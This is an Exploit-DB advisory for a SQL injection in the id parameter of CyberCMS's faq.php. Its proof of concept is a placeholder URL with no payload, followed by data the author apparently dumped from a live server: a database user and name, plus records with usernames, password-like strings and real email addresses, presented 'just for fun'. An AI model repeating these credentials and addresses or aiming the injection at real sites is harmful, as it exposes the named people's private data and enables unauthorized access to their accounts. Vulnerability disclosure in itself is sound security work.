CyberCMS - SQL Injection

EDB-ID:

11895

CVE:

N/A


Author:

hc0de

Type:

webapps


Platform:

PHP

Date:

2010-03-26


# Exploit Title: CyberCMS Remote SQL Injection Vuln.
# Date: 26/11/2009
# Author: hc0de | hc0de.blogspot.com<http://hc0de.blogspot.com>
# Software Link: http://cyberfusion.ramx.org/cyber-cms
# Version: [app version]
# Tested on: Ubuntu Linux 9.04
# CVE :
# PoC:

+Target: http://server/faq.php?id=SQL_CODE

-MySQL Version: 5.0.37-community-nt
-MySQL User: skoleung@localhost
-MySQL Database: uskole

+Datas:
3:memborg:memborg:1:memborg@cyberfusion.dk<mailto:3%3Amemborg%3Amemborg%3A1%3Amemborg@cyberfusion.dk>
6:Leder:huskerikke:1:john.landbo@morsoe.dk<mailto:6%3ALeder%3Ahuskerikke%3A1%3Ajohn.landbo@morsoe.dk>
...etc.. :) just for fun :P